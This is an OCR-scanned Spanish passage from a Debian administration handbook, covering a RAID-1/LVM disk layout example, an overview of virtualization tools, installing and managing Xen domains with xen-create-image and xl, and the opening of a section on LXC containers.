Disk  /dev/sda:  300  GB,  300090728448  bytes,  586114704  sectors 

Units:  sectors  of  1  *  512  =  512  bytes 

Sector  size  (logical/physical) :  512  bytes  /  512  bytes 

I/O  size  (minimum/optimal):  512  bytes  /  512  bytes 

Disklabel  type:  dos 

Disk  identifier:  0x00039a9f 


Device  Boot 

Start 

End 

Sectors 

Size 

Id 

Type 

/dev/sdal  * 

2048 

1992060 

1990012 

1.0G 

fd 

Linux 

raid 

autodetect 

/dev/sda2 

1992061 

3984120 

1992059 

1.0G 

82 

Linux 

swap 

/  Solaris 

/dev/sda3 

4000185 

586099395 

582099210 

298G 

5 

Extended 

/dev/sda5 

4000185 

203977305 

199977120 

102G 

fd 

Linux 

raid 

autodetect 

/dev/sda6 

203977306 

403970490 

199993184 

102G 

fd 

Linux 

raid 

autodetect 

/dev/sda7 

403970491 

586099395 

182128904 

93G 

8e 

Linux 

LVM 

■  Agrupamos  las  primeras  particiones  de  ambos  discos  (de  alrededor  de  1  GB)  en  un  volu- 
men  RAID-1,  md0.  Utilizamos  el  espejo  directamente  para  almacenar  el  sistema  de  archivos 
raiz. 

■  Utilizamos  las  particiones  sda2  y  sdc2  como  particiones  de  intercambio  que  proveen  un 
total  de  2  GB  de  espacio  de  intercambio.  Con  1  GB  de  RAM,  la  estacion  de  trabajo  tiene  una 
cantidad  adecuada  de  memoria  disponible. 

■  Agrupamos  las  particiones  sda5  y  sdc5,  asi  como  tambien  sda6  y  sdc6,  en  dos  nuevos  vo¬ 
lumenes  RAID-1  de  alrededor  de  100  GB  cada  uno:  mdl  y  md2.  Inicializamos  ambos  espejos 
como  volumenes  fisicos  para  LVM  y  se  los  asigna  al  grupo  de  volumenes  vg_raid.  Por  lo 
tanto,  este  VG  contiene  aproximadamente  200  GB  de  espacio  seguro. 

■  Utilizamos  las  particiones  restantes,  sda7  y  sdc7,  directamente  como  volumenes  fisicos 
y  las  asignamos  a  otro  VG  llamado  vg_bulk  que  contiene,  de  esa  forma,  alrededor  de  200 
GB  de  espacio. 

Una  vez  que  crearomos  los  VGs,  podemos  particionalos  de  forma  muy  flexible.  Uno  debe  recor- 
dar  que  se  preservaran  los  LVs  creados  en  vg_raid  aun  si  falla  uno  de  los  discos,  pero  no  sera  el 
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caso  de  los  LVs  creados  en  vg_bulk;  por  el  otro  lado,  este  ultimo  sera  resevado  en  paralelo  en 
ambos  discos  lo  que  permitira  velocidades  de  lecturay  escritura  mayores  para  archivos  grandes. 

Asique  crearemos  los  LVs  lv_usr,  lv_va ry lv_home  en  vg_raid  para  almacenarlos  sistemas  de 
archivos  correspondientes;  utilizaremos  otro  LV  grande,  Ivmovies,  para  almacenar  las  versio- 
nes  finales  de  los  videos  luego  de  editarlos.  Dividiremos  el  otro  VG  en  un  gran  lv_rushes,  para 
datos  directamente  obtenidos  de  las  camaras  de  video  digital,  y  lv_tmp  para  archivos  tempo- 
rales.  La  ubicacion  del  area  de  trabajo  es  una  decision  menos  directa:  si  bien  necesitamos  buen 
rendimiento  en  dicho  volumen,  ^se  justifica  perder  trabajo  si  falla  un  disco  durante  una  sesion 
de  edicion?  Dependiendo  de  la  respuesta  a  dicha  pregunta,  crearemos  el  LV  correspondiente  en 
un  VG  o  el  otro. 

Ah  ora  tenemos  tanto  redundancia  para  datos  importantes  como  flexibilidad  sobre  la  forma  en  la 
que  se  divide  el  espacio  disponible  entre  las  aplicaciones.  En  caso  que  se  instale  nuevo  software 
(para  editar  pistas  de  audio  por  ejemplo),  puede  aumentar  sin  problemas  el  LV  que  almacena 
/us  r/. 


NOTA 

^Porque  tres  volumenes 
RAID-1? 


El  razonamiento  para  la  segunda  division  (mdl  vs.  md2)  es  menos  estricto  y  esta  mas 
relacionado  con  el  reconocimiento  que  el  futuro  es  incierto.  Cuando  se  ensamblo  el 
equipo,  no  se  conocian  exactamente  los  requisitos;  tambien  puede  evolucionar  con 
el  tiempo.  En  nuestro  caso,  no  podemos  saber  por  adelantado  la  necesidad  de  es¬ 
pacio  de  almacenamiento  de  cada  tipo  de  videos.  Si  un  video  en  particular  necesita 
una  gran  cantidad  de  videos  sin  editar,  y  el  VG  dedicado  para  datos  redundantes  no 
tiene  mas  de  la  mitad  del  espacio  disponible,  podemos  reutilizar  parte  de  su  espa¬ 
cio  innecesario.  Podemos  quitar  uno  de  los  volumenes  fisicos,  por  ejemplo  md2  de 
vgraid  y  asignarlo  a  vgbulk  directamente  (si  la  duracion  esperada  de  la  opera- 
cion  es  suficientemente  corta  como  para  que  no  nos  preocupe  la  perdida  temporal 
de  rendimiento),  o  deshacer  la  configuracion  RAID  en  md2  e  integrar  sus  componen- 
tes,  sda6  y  sdc6  en  el  VG  (que  crecera  200  GB  en  lugar  de  100  GB);  luego  podremos 
aumentar  el  volumen  logico  Ivrushes  segun  se  necesite. 


Podriamos  haber  creado  solo  un  volumen  RAID-1  a  utilizar  como  volumen  fisico 
para  vg  raid.  ^Por  que  creamos  tres  entonces? 

El  razonamiento  para  la  primera  division  (mdO  y  los  demas)  es  por  seguridad  de  los 
datos:  los  datos  escritos  a  ambos  elementos  de  un  espejo  RAID-1  son  exactamente 
los  mismos,  por  lo  que  es  posible  evitar  la  capa  RAID  y  montar  uno  de  los  discos 
directamente.  En  caso  de  un  error  del  nucleo,  por  ejemplo,  o  si  se  corrompen  los 
metadatos  LVM  todavia  es  posible  arrancar  un  sistema  mi'nimo  para  acceder  datos 
criticos  como  la  distribucion  de  discos  en  los  volumenes  RAID  y  LVM;  podremos 
luego  reconstruir  los  metadatos  y  acceder  a  los  archivos  nuevamente,  para  poder 
devolver  el  sistema  a  su  estado  normal. 


12.2.  Virtualizacion 

La  virtualizacion  es  uno  de  los  avances  mas  grandes  de  la  informatica  en  los  ultimos  anos.  El 
termino  abarca  varias  abstracciones  y  tecnicas  de  simulacion  de  equipos  virtuales  con  un  grado 
variable  de  independencia  de  hardware  real.  Un  servidor  fisico  puede  almacenar  varios  siste¬ 
mas  que  funcionan  de  forma  simultaneay  aislada.  Sus  aplicaciones  son  muchas  y  generalmente 
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surgen  de  este  aislamiento:  entornos  de  prueba  con  diferentes  configuraciones  o  separar  los 
servicios  provistos  entre  diferentes  maquinas  virtuales  por  seguridad. 

Hay  multiples  soluciones  de  virtualizacion,  cada  una  con  sus  ventajas  y  desventajas.  Este  libro  se 
concentrara  en  Xen,  LXC  y  KVM;  pero  otras  implementaciones  notables  incluyen  las  siguientes: 

■  QEMU  es  un  emulador  en  software  para  un  equipo  completo;  su  rendimiento  esta  lejos  de 
la  velocidad  que  uno  podria  conseguir  si  ejecutara  nativamente,  pero  esto  permite  ejecu- 
tar  en  el  hardware  emulado  sistemas  operativos  sin  modificacion  o  experimentales.  Tam- 
bien  permite  emular  una  arquitectura  de  hardware  diferente:  por  ejemplo,  un  sistema 
amd.64  puede  emular  una  maquina  arm.  QEMU  es  software  libre. 

http://www.qemu.org/ 

■  Bochs  es  otra  maquina  virtual  libre,  pero  solo  emula  la  arquitectura  x86  (i386  y  amd64). 

■  VMWare  es  una  maquina  virtual  privativa;  como  es  una  de  las  mas  antiguas  es  tambien 
una  de  las  mas  conocidas.  Funciona  sobre  cimientos  similares  a  los  de  QEMU.  VMWare 
propone  funcionalidad  avanzada  como  instantaneas  («snapshot»)  de  una  maquina  virtual 
en  ejecucion. 

http://www.vmware.com/ 

■  VirtualBox  es  una  maquina  virtual  que  es  software  libre  en  su  mayor  parte  (algunos  com- 
ponentes  adicionales  estan  disponibles  bajo  una  licencia  privativa).  Por  desgracia  esta  en 
la  seccion  ’’contrib”  de  Debian  porque  incluye  algunos  ficheros  precompilados  que  no  se 
pueden  recrear  sin  un  compilador  propietario.  Es  mas  joven  que  VMWare  y  limitada  a  las 
arquitecturas  i386  y  amd64,  pero  incluye  cierta  compatibilidad  con  instantaneas  y  otras 
funcionalidades  interesantes. 

http://www.virtualbox.org/ 


12.2.1.  Xen 

Xen  es  una  solucion  de  «paravirtualizacion».  Introduce  una  fina  capa  de  abstraccion,  llamada 
«hypervisor»,  entre  el  hardware  y  los  sistemas  superiores;  esta  actua  como  arbitro  controlando 
el  acceso  al  hardware  desde  las  maquinas  virtuales.  Sin  embargo,  solo  gestiona  unas  pocas  ins- 
trucciones,  las  demas  se  ejecutan  directamente  en  el  hardware  en  nombre  de  los  sistemas.  La 
principal  ventaja  es  que  no  se  degrada  el  rendimiento  y  los  sistemas  ejecutan  a  velocidades  cer- 
canas  a  la  nativa;  la  desventaja  es  que  el  micleo  de  los  sistemas  operativos  que  uno  desee  utilizar 
en  un  hypervisor  Xen  necesita  ser  adaptado  para  ejecutar  sobre  Xen. 

Pasemos  un  poco  de  tiempo  en  los  terminos.  El  hypervisor  es  la  capa  mas  baja  que  ejecuta  di¬ 
rectamente  en  el  hardware,  inclusive  debajo  del  nucleo.  Este  hypervisor  puede  dividir  el  resto 
del  software  entre  varios  dominios  («domains»),  pueden  interpretarse  como  maquinas  virtuales. 
Se  conoce  a  uno  de  estos  dominios  (el  primero  en  iniciar)  como  domO  y  tiene  un  rol  especial  ya 
que  solo  este  dominio  puede  controlar  al  hypervisor  y  la  ejecucion  de  otros  dominios.  Se  cono- 
cen  a  los  otros  dominios  como  domU.  En  otras  palabras,  desde  el  punto  de  vista  del  usuario,  el 
domO  es  el  «anfitrion»  de  los  demas  sistemas  de  virtualizacion,  mientras  que  los  domU  son  sus 
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«invitados». 


CULTURA  Inicialmente,  se  desarrollo  Xen  como  un  conjunto  de  parches  que  existfan  fuera 
Xen  y  las  varias  versiones  del  drbol  oficial  y  no  estaban  integrados  en  el  nucleo  Linux.  Al  mismo  tiempo,  mu- 

de  Linux  chos  sistemas  de  virtualizacion  emergentes  (incluyendo  KVM)  necesitaban  ciertas 

funciones  relacionadas  con  la  virtualizacion  para  facilitar  su  integracion  y  el  nu¬ 
cleo  Linux  desarrollo  dichas  funciones  (conocidas  como  la  interfaz  paravirtops  o 
pv  ops).  Debido  a  que  algunos  parches  de  Xen  duplicaban  parte  de  lafuncionalidad 
de  esta  interfaz  no  podfan  ser  aceptados  oficialmente. 

Xensource,  la  empresa  detras  de  Xen,  tuvo  entonces  que  migrar  Xen  a  esta  nue- 
va  interfaz  para  que  se  pudieran  integrar  los  parches  Xen  al  nucleo  Linux  oficial. 
Esto  signified  reescribir  mucho  codigo  y,  si  bien  Xensource  consiguio  una  version 
funcional  basada  en  la  interfaz  paravirt  ops  rapidamente,  los  parches  fueron  in- 
cluidos  progresivamente  en  el  nucleo  oficial.  Esta  integracion  se  completo  en  Linux 
3.0. 

•*-  http : //wiki . xenproj ect . org/wiki/Xen Paravirtops 

Dado  que  Jessie  utiliza  la  version  3.16  del  nucleo  Linux,  los  paquetes  linux-image- 
686-pae  y  // nux-i mage-amd64  incluyen  el  codigo  necesario,  ya  no  existen  los  par¬ 
ches  especificos  necesarios  para  Debian  Squeeze  y  anteriores. 

http : //wiki . xenproj  ect . org/wiki/Xen_Kernel_Feature_Mat rix 


NOTA 

Arquitecturas 
compatibles  con  Xen 


Xen  actualmente  solo  esta  disponible  para  las  arquitecturas  i386,  amd64,  arm64  y 
armhf. 


CULTURA  Xen  necesita  modificaciones  en  todos  los  sistemas  operativos  que  uno  desee  eje- 
Xen  y  nucleos  distintos  a  cutar  en  el;  no  todos  los  nucleos  tiene  el  mismo  nivel  de  madurez  en  este  aspecto. 

Linux  Muchos  son  completamente  funcionales,  tanto  para  domO  como  para  domU:  Linux 
3.0  y  posterior,  NetBSD  4.0  y  posterior  y  OpenSolaris.  Otros  solo  funcionan  como 
domU.  Puede  comprobar  el  estado  de  cada  sistema  operativo  en  la  wiki  de  Xen: 

•-  http : //wiki . xenproj  ect . org/wiki/Dom0_Kernels_for_Xen 

http : //wiki . xenproj  ect . org/wiki/DomU_Support_for_Xen 

Sin  embargo,  si  Xen  puede  confiar  en  funciones  de  hardware  dedicadas  a  la  virtuali¬ 
zacion  (que  solo  estan  presentes  en  procesadores  mas  recientes)  inclusive  sistemas 
operativos  sin  modificacion  pueden  ejecutar  como  domU  (incluyendo  Windows). 


Utilizar  Xen  en  Debian  requiere  tres  componentes: 

■  El  hipervisor  en  si  mismo.  Segtin  el  hardware  disponible,  el  paquete  apropiado  sera  xen- 
hypervisor-4.4-amd64,  xen-hypervisor-4.4-armhf  o  xen-hypervisor-4.4-arm64. 

■  Un  nucleo  que  ejecuta  sobre  dicho  hipervisor.  Cualquier  nucleo  posterior  a  3.0  funcionara, 
incluyendo  la  version  3.16  presente  en  Jessie. 

■  La  arquitectura  i386  tambien  necesita  una  biblioteca  estandar  con  los  parches  apropiados 
para  aprovechar  Xen;  esta  se  encuentra  en  el  paquete  libc6-xen. 
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Para  poder  evitar  la  molesta  de  seleccionar  estos  componentes  a  mano,  tiene  disponibles  varios 
paquetes  por  conveniencia  (como  xen-linux-system-amd64 );  todos  ellos  incluiran  una  combina- 
cion  de  paquetes  del  nucleo  e  hypervisor  que  se  sabe  funcionan  bien.  El  hypervisor  tambien 
incluira  xen-utils-4.4,  que  contien  las  herramientas  para  controlar  el  hypervisor  desde  el  domO. 
A  su  vez,  este  incluira  la  biblioteca  estandar  apropiada.  Durante  la  instalacion  de  todo  esto,  los 
scripts  de  configuracion  tambien  crearan  un  nuevo  elemento  en  el  menu  del  gestor  de  arranque 
Grub  para  iniciar  el  nucleo  elegido  en  un  domO  Xen.  Sepa  sin  embargo  que  generalmente  este 
no  sera  el  primero  en  la  lista  y,  por  lo  tanto,  no  estara  seleccionado  de  forma  predeterminada. 
Si  este  no  es  el  comportamiento  que  desea,  ej  ecu  tar  lo  siguiente  lo  cambiara: 

#  mv  /etc/grub. d/20_linux_xen  /etc/grub. d/09_linux_xen 

#  update-grub 

Una  vez  que  instalo  estos  prerequisites,  el  siguiente  paso  es  probar  el  comportamiento  del  domO 
en  si  mismo;  esto  incluye  reiniciar  para  utilizar  el  hypervisor  y  nucleo  Xen.  El  sistema  deberia 
iniciar  como  siempre,  con  unos  pocos  mensajes  adicionales  en  la  consola  durante  los  primeros 
pasos  de  inicializacion. 

Ahora  es  el  momento  de  instalar  sistemas  utiles  en  los  sistemas  domU,  utilizando  las  herra¬ 
mientas  en  xen-tools.  Este  paquete  provee  el  programa  xen -create -image,  que  automatiza  en 
gran  parte  esta  tarea.  El  unico  parametro  obligatorio  es  —hostname,  que  le  da  un  nombre  al 
domU;  otras  opciones  son  importantes,  pero  puede  guardarlas  en  el  archivo  de  configuracion 
/etc/xen-  tools/xen  -  tools  .  conf  y  si  no  las  especifica  no  generara  ningun  error.  Por  lo  tanto 
es  importante  revisar  el  contenido  de  este  archivo  antes  de  crear  imagenes  o  utilizar  los  para- 
metros  adicionales  en  la  invocacion  de  xen  -  c  reate  -  image.  Los  parametros  importantes  a  saber 
incluyen  los  siguientes: 

■  —memory  para  especificar  la  cantidad  de  RAM  dedicada  a  este  nuevo  sistema  creado; 

■  —size  y  —swap  para  definir  el  tamano  de  los  «discos  virtuales»  disponibles  al  domU; 

■  —debootstrap  para  causar  que  se  instale  el  nuevo  sistema  con  debootstrap;  en  tal  caso, 
generalmente  tambien  utilizara  la  opcion  — dist  (con  el  nombre  de  una  distribucion  como 
jessie). 

■  —  dhep  indica  que  el  domU  debe  obtener  su  configuracion  de  red  a  traves  de  DHCP,  mien- 
tras  que  —ip  permite  definir  una  direccion  IP  estatica. 

■  Por  ultimo,  debe  elegir  un  metodo  de  almacenamiento  para  las  imagenes  a  crear  (que 
el  domU  vera  como  discos  duros).  El  metodo  mas  simple,  que  corresponde  a  la  opcion  - 
-dir,  es  crear  un  archivo  en  el  domO  para  cada  dispositivo  que  se  le  provee  al  domU.  La 
alternativa  en  sistemas  que  utilizan  LVM  es  la  opcion  —  Ivm  seguida  del  nombre  de  un 
grupo  de  volumenes;  xen -create -image  luego  creara  un  nuevo  volumen  logico  dentro 
de  dicho  grupo  y  este  estara  disponible  en  el  domU  como  un  disco  duro. 


YENDO  MAS  ALLA 

En  el  caso  de  un  sistema  distinto  a  Linux,  debe  tener  cuidado  de  definir  el 

Instalacion  de  un  sistema 

nucleo  que  debe  utilizar  el  domU  con  la  opcion  -  -kernel. 

distinto  a  Debian  en  un 

domU 
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NOTA  Tambien  puede  exportar  discos  duros  completos  al  domU,  particiones, 
Almacenamiento  en  el  arrays  RAID  o  volumenes  logicos  LVM  preexistentes.  Sin  embargo,  estas 
domU  operaciones  no  estan  automatizadas  por  xen-create-image,  por  lo  que 
debera  editar  el  archivo  de  configuracion  de  la  imagen  luego  de  crearlo  con 
xen-create-image. 

Una  vez  que  realizo  esta  eleccion,  puede  crear  la  imagen  para  nuestro  futuro  domU  Xen: 

#  xen-create-image  --hostname  testxen  --dhcp  --dir  /srv/testxen  --size=2G  --dist= 
jessie  --role=udev 

[...] 

General  Information 


Hostname  :  testxen 

Distribution  :  jessie 

Mirror  :  http://ftp.debian.org/debian/ 

Partitions  :  swap  128Mb  (swap) 

/  2G  (ext3) 

Image  type  :  sparse 

Memory  size  :  128Mb 

Kernel  path  :  /boot/vmlinuz-3 . 16 . 0-4-amd64 
Initrd  path  :  /boot/initrd . img-3 . 16 . 0-4-amd64 

[...] 

Logfile  produced  at: 

/var/log/xen -tools/ testxen . log 

Installation  Summary 


Hostname  :  testxen 

Distribution  :  jessie 
MAC  Address  :  00 : 16 : 3E : 8E : 67 : 5C 

IP-Address(es)  :  dynamic 

RSA  Fingerprint  :  0a : 6e : 71 : 98 : 95 : 46 : 64 : ec : 80 : 37 : 63 : 18 : 73 : 04 : dd : 2b 
Root  Password  :  adaX2jyRHNuWm8BDJS7PcEJ 

Ahora  tenemos  una  maquina  virtual,  pero  no  esta  ejecutando  (por  lo  tanto  solo  utiliza  espacio 
en  el  disco  duro  del  domO).  Por  supuesto,  podemos  crear  mas  imagenes,  posiblemente  con  dife- 
rentes  parametros. 

Antes  de  encender  estas  maquinas  virtuales,  necesitamos  definir  como  accederemos  a  ellas.  Por 
supuesto,  podemos  considerarlas  maquinas  aisladas  a  las  que  solo  podemos  acceder  a  traves  de 
su  consola  de  sistema,  pero  rara  vez  esto  coincide  con  el  patron  de  uso.  La  mayoria  de  las  veces, 
consideraremos  un  domU  como  un  servidor  remoto  al  que  solo  podemos  acceder  a  traves  de  la 
red.  Sin  embargo,  seria  un  gran  inconveniente  agregar  una  tarjeta  de  red  para  cada  domU;  es 
por  esto  que  Xen  permite  crear  interfaces  virtuales  que  cada  dominio  puede  ver  y  utilizar  de  la 
forma  estandar.  Sepa  que  estas  tarjetas,  aunque  sean  virtuales,  solo  seran  utiles  cuando  esten 
conectadas  a  una  red,  inclusive  una  virtual.  Xen  tiene  varios  modelos  de  red  para  esto: 
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■  El  modelo  mas  simple  es  el  modelo  puente  («bridge»);  todas  las  tarjetas  de  red  etho  (tanto 
en  los  sistemas  domU  como  en  el  domO)  se  comportaran  como  si  estuvieran  conectadas 
directamente  a  un  switch  Ethernet. 

■  Luego  esta  el  modelo  enrutamiento  («routing»)  en  el  que  el  domO  se  comporta  como  el 
router  entre  los  sistemas  domU  y  la  red  (fisica)  externa. 

■  Finalmente,  en  el  modelo  NAT,  nuevamente  el  domO  se  encuentra  entre  los  sistemas  domU 
y  el  resto  de  la  red,  pero  no  se  puede  acceder  a  los  sistemas  domU  directamente  desde 
afuera  y  el  trafico  atraviesa  una  traduccion  de  direcciones  de  red  en  el  domO. 

Estos  tres  modos  de  red  involucran  una  cantidad  de  interfaces  con  nombres  inusuales,  como 
vif  *,  veth*,  peth*  y  xenbrO.  El  hypervisor  Xen  los  acomoda  en  la  distribucion  definida  bajo  el 
control  de  las  herramientas  en  espacio  de  usuario.  Debido  a  que  los  modelos  NAT  y  de  enruta¬ 
miento  solo  se  adaptan  a  casos  particulares  solo  discutiremos  el  modelo  de  puente. 

La  configuracion  estandar  de  los  paquetes  Xen  no  modifica  la  configuracion  de  red  del  sistema. 
Sin  embargo,  se  configura  el  demonio  xend  para  integrar  las  interfaces  de  red  virtuales  en  un 
puente  de  red  preexistente  (xenbrO  tiene  precedencia  si  existen  varios  de  ellos).  Por  lo  tanto, 
debemos  configurar  un  puente  en  /etc/network/interfaces  (lo  que  requiere  que  instalemos 
el  paquete  bridge-utils,  razon  por  la  que  lo  recomienda  el  paquete  xen-utils-4.4 )  para  reemplazar 
el  elemento  etho  existente: 

auto  xenbrO 

iface  xenbrO  inet  dhcp 
bridgeports  ethO 
b ridge  maxwait  0 

Luego  de  reiniciar  para  asegurarse  que  se  crea  el  puente  automaticamente,  podemos  iniciar  el 
domU  con  las  herramientas  de  control  de  Xen,  en  particular  el  programa  xl.  Este  programa 
permite  varias  manipulaciones  de  los  dominios,  entre  ellas:  enumerarlos,  iniciarlos  y  detenerlos. 

#  xl  list 


Name 

ID 

Mem 

VCPUs 

State 

Time(s) 

Domain-0 

#  xl  create  /etc/xen/testxen . cfg 

Parsing  config  from  /etc/xen/testxen . cfg 

#  xl  list 

0 

463 

1 

r . 

9.8 

Name 

ID 

Mem 

VCPUs 

State 

Time(s) 

Domain-0 

0 

366 

1 

r . 

11.4 

testxen 

1 

128 

1 

-b - 

1.1 

HERRAMIENTA  En  Debian  7  y  versiones  anteriores,  la  herramienta  de  li'nea  de  comando  xm  era  la 

Eleccion  del  conjunto  de  referenda  para  gestionar  maquinas  virtuales  Xen.  Ahora  ha  sido  reemplazada  por 

herramientas  para  XU  cua'  es  mayormente  compatible  con  versiones  anteriores.  Pero  no  son  las 

gestionar  las  maquinas  unicas  herramientas:  virsh  de  libvirt  y  xe  de  la  XAPI  de  XenServer  (ofrecimiento 

virtuales  de  Xen  comercial  de  Xen)  son  herramientas  alternativas. 
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PRECAUCION  Si  bien  es  posible  tener  varios  sistemas  domU  ejecutando  en  paralelo,  siempre  nece- 
jSolo  un  domU  por  sitaran  utilizar  su  propia  imagen  ya  que  se  le  hace  creer  a  cada  domU  que  ejecuta 
imagen!  en  su  ProP'°  hardware  (ademas  de  la  pequena  porcion  del  nucleo  que  interactua 
con  el  hypervisor).  En  particular,  no  es  posible  que  dos  sistemas  domU  ejecutando 
en  paralelo  compartan  espacio  de  almacenamiento.  Si  los  sistemas  domU  no  eje- 
cutan  al  mismo  tiempo,  sin  embargo,  es  posible  reutilizar  la  misma  particion  de 
intercambio  o  la  particion  que  alberga  el  sistema  de  archivos  /home. 


Sepa  que  el  domU  testxen  utiliza  memoria  real  -  no  simulada  -  de  la  RAM  que,  de  lo  contrario, 
estarfa  disponible  en  el  domO.  Debe  tener  cuidado  al  construir  un  servidor  para  instancias  Xen, 
asegurandose  de  incluir  suficente  RAM  fi'sica. 

jVoila!  Nuestra  maquina  virtual  esta  iniciando.  Podemos  acceder  a  ella  de  dos  formas.  La  forma 
usual  es  conectarnos  «remotamente»  a  traves  de  la  red,  como  lo  harfamos  con  una  maquina 
real;  esto  usualmente  requerira  configurar  un  servidor  DHCP  o  alguna  configuracion  de  DNS.  La 
otra  forma,  que  puede  ser  la  unica  forma  si  la  configuracion  de  red  era  incorrecta,  es  utilizar  la 
consola  hvc0  ejecutando  xl  console: 

#  xl  console  testxen 

[...] 

Debian  GNU/Linux  8  testxen  hvcO 
testxen  login: 

Uno  puede  abrir  una  sesion,  tal  como  si  estuviera  sentado  frente  al  teclado  de  la  maquina  virtual. 
Puede  desconectarse  de  esta  consola  con  la  combinacion  de  teclas  Control+]. 


SUGERENCIA  A  veces  uno  desea  iniciar  un  sistema  domU  e  ingresar  a  su  consola  inmediatamente; 
Ingreso  a  la  consola  es  Por  es^°  tlue  coman(io  xl  create  usa  la  opcion  -c.  Iniciar  un  domU  con  esta 
inmediatamente  opcion  mostrara  todo  los  mensajes  del  sistema  que  se  inicie. 


HERRAMIENTA  OpenXenManager  (en  el  paquete  openxenmanager)  es  una  interfaz  grafica  que 
OpenXenManager  permite  controlar  remotamente  los  dominios  Xen  a  traves  de  la  API  de  Xen.  Provee 
la  mayoria  de  la  funciondalidad  del  programa  xl. 


Una  vez  que  el  domU  esta  ejecutando,  puede  utilizarlo  como  cualquier  otro  servidor  (al  fin  y 
al  cabo  es  un  sistema  GNU/Linux).  Sin  embargo,  su  existencia  como  maquina  virtual  permite 
cierta  funcionalidad  adicional.  Por  ejemplo,  puede  pausar  y  resumir  temporalmente  un  domU, 
ejecutando  xl  pauseyxl  unpause.  Sepa  que  aunque  un  domU  pausado no  utiliza  el  procesador, 
la  memoria  reservada  a  el  sigue  en  uso.  Puede  ser  interesante  considerar  las  ordenes  xl  save  y 
xl  restore:  guardar  un  domU  libera  los  recursos  utilizados  por  este  domU,  incluyendo  la  RAM. 
Cuando  restaure  (o  resuma)  un  domU,  este  no  notara  nada  a  excepcion  del  paso  del  tiempo.  Si  un 
domU  esta  ejecutando  cuando  se  apague  el  domO,  los  scripts  empaquetados  automaticamente 
guardaran  el  domU  y  lo  restauraran  cuando  vuelva  a  iniciar.  Esto,  por  supuesto,  tiene  los  mismos 
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inconvenientes  estandar  que  cuando  hiberna  un  equipo  portatil,  por  ejemplo;  en  particular,  si  se 
suspende  por  demasiado  tiempo  al  domU,  pueden  expirar  las  conexiones  de  red.  Sepa  tambien 
que,  hasta  el  momento,  Xen  es  incompatible  con  gran  parte  de  la  gestion  de  energia  ACPI,  lo  que 
evita  que  pueda  suspender  el  sistema  anfitrion  (domO). 


DOCUMENTACION 

La  mayona  de  las  subordenes  de  xl  esperan  uno  o  mas  parametros,  generalmente 

Opciones  de  xl 

el  nombre  de  un  domU.  Se  describen  en  detalle  estos  parametros  en  la  pagina  de 
manual  xl  ( 1) . 

Puede  apagar  o  reiniciar  un  domU  tanto  desde  dentro  del  domU  (con  el  programa  shutdown) 
como  tambien  desde  el  domO,  ejecutan  do  xm  shutdown  o  xl  reboot. 

YENDO  MAS  ALLA 

Xen  tiene  mucha  mas  funcionalidad  de  la  que  podemos  describir  en  estos  pocos 

Xen  avanzado 

parrafos.  En  particular,  el  sistema  es  muy  dinamico  y  puede  ajustar  muchos  para¬ 
metros  de  un  dominio  (como  cantidad  de  memoria  reservada,  discos  duros  visibles, 
comportamiento  de  las  tareas  programadas,  etc.)  aun  cuando  este  esta  ejecutando. 
jlnclusive  puede  migrar  un  domU  entre  servidors  sin  apagarlo  y  sin  perder  sus  co¬ 
nexiones  de  red!  Para  saber  mas  de  todos  estos  aspectos  avanzados,  la  fuente  de 
informacion  principal  es  la  documentacion  oficial  de  Xen. 

•-  http : //www. xen . org/support/documentation . html 

12.2.2.  LXC 

Aun  cuando  es  utilizado  para  crear  «maquinas  virtuales»,  LXC  no  es,  estrictamente  hablando, 
un  sistema  de  virtualizacion  sino  un  sistema  para  aislar  grupos  de  procesos  entre  si  aun  cuando 
estos  ejecutan  en  el  mismo  equipo.  Aprovecha  un  conjunto  de  evoluciones  recientes  del  nucleo 
Linux,  conocidos  colectivamente  como  grupos  de  control  («control  groups»),  mediante  los  que  di- 
ferentes  conjuntos  de  procesos  llamados  «grupos»  tienen  diferentes  visiones  de  ciertos  aspectos 
de  todo  el  sistema.  Entre  estos  aspectos,  los  mas  notables  son  los  identificadores  de  procesos,  la 
configuracion  de  red  y  los  puntos  de  montaje.  Un  grupo  de  procesos  aislados  no  podra  acceder  a 
otros  procesos  en  el  sistema  y  puede  restringir  su  acceso  al  sistema  de  archivos  a  un  subconjun- 
to  especifico.  Tambien  puede  tener  su  propia  interfaz  de  red  y  tabla  de  enrutamiento  y  puede 
configurarlo  para  que  solo  pueda  ver  un  subconjunto  de  los  dispositivos  disponibles  que  estan 
presentes  en  el  sistema. 

Puede  combinar  estas  funcionalidades  para  aislar  una  familia  de  procesos  completa  que  inicia 
desde  el  proceso  init,  y  el  conjunto  resultante  es  muy  similar  a  una  maquina  virtual.  El  nombre 
oficial  de  esta  configuracion  es  «contenedor»  (de  alii  LXC:  contenedores  Linux,  «LinuX  Contai- 
ners»),  pero  una  diferencia  importante  con  maquinas  virtuales  «reales»  como  aquellas  provis¬ 
tas  por  Xen  o  KVM  es  que  no  hay  un  segundo  nucleo;  el  contenedor  utiliza  el  mismo  nucleo  que 
el  sistema  anfitrion.  Esto  tiene  tanto  ventajas  como  desventajas:  las  ventajas  incluyen  un  rendi- 
miento  excelente  debido  a  una  falta  completa  de  sobrecargay  el  hecho  de  que  el  nucleo  tiene  una 
vision  global  de  todos  los  procesos  que  ejecutan  en  el  sistema  por  lo  que  la  gestion  de  procesos 
puede  ser  mas  eficiente  que  si  existieran  dos  nucleos  independientes  administrando  conjuntos 
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de  tareas.  La  mayor  de  las  desventajas  es  la  imposibilidad  de  ejecutar  un  nucleo  diferente  en  un 
contenedor  (sea  una  version  diferente  de  Linux  o  directamente  un  sistema  operativo  distinto). 


NOTA  Los  contenedores  LXC  no  proveen  el  nivel  de  aislamiento  que  proveen  emuladores 
Limites  de  aislamiento  en  °  virtualizadores  mas  pesados.  En  particular: 

LXC 

■  debido  a  que  el  sistema  anfitrion  y  los  contendores  comparten  el  nucleo,  los 
procesos  limitados  en  un  contenedor  todavia  pueden  acceder  a  los  mensajes 
del  nucleo,  lo  que  puede  causar  que  se  filtre  informacion  si  un  contenedor 
emite  mensajes; 

■  por  razones  similares,  si  se  compromete  un  contenedor  y  se  explota  una  vul- 
nerabilidad  del  nucleo,  puede  afectar  a  otros  contenedores; 

■  en  el  sistema  de  archivos,  el  nucleo  supervisa  los  permisos  segun  identifi- 
cadores  numericos  para  los  usuarios  y  grupos;  estos  identificadores  pueden 
designar  usuarios  y  grupos  diferentes  segun  el  contenedor,  debe  tenerlo  en 
cuenta  si  los  contenedores  comparten  permisos  de  escritura  a  partes  del  sis¬ 
tema  de  archivos. 


Debido  a  que  estamos  trabajando  con  aislamiento  en  lugar  de  virtualizacion,  configurar  contene¬ 
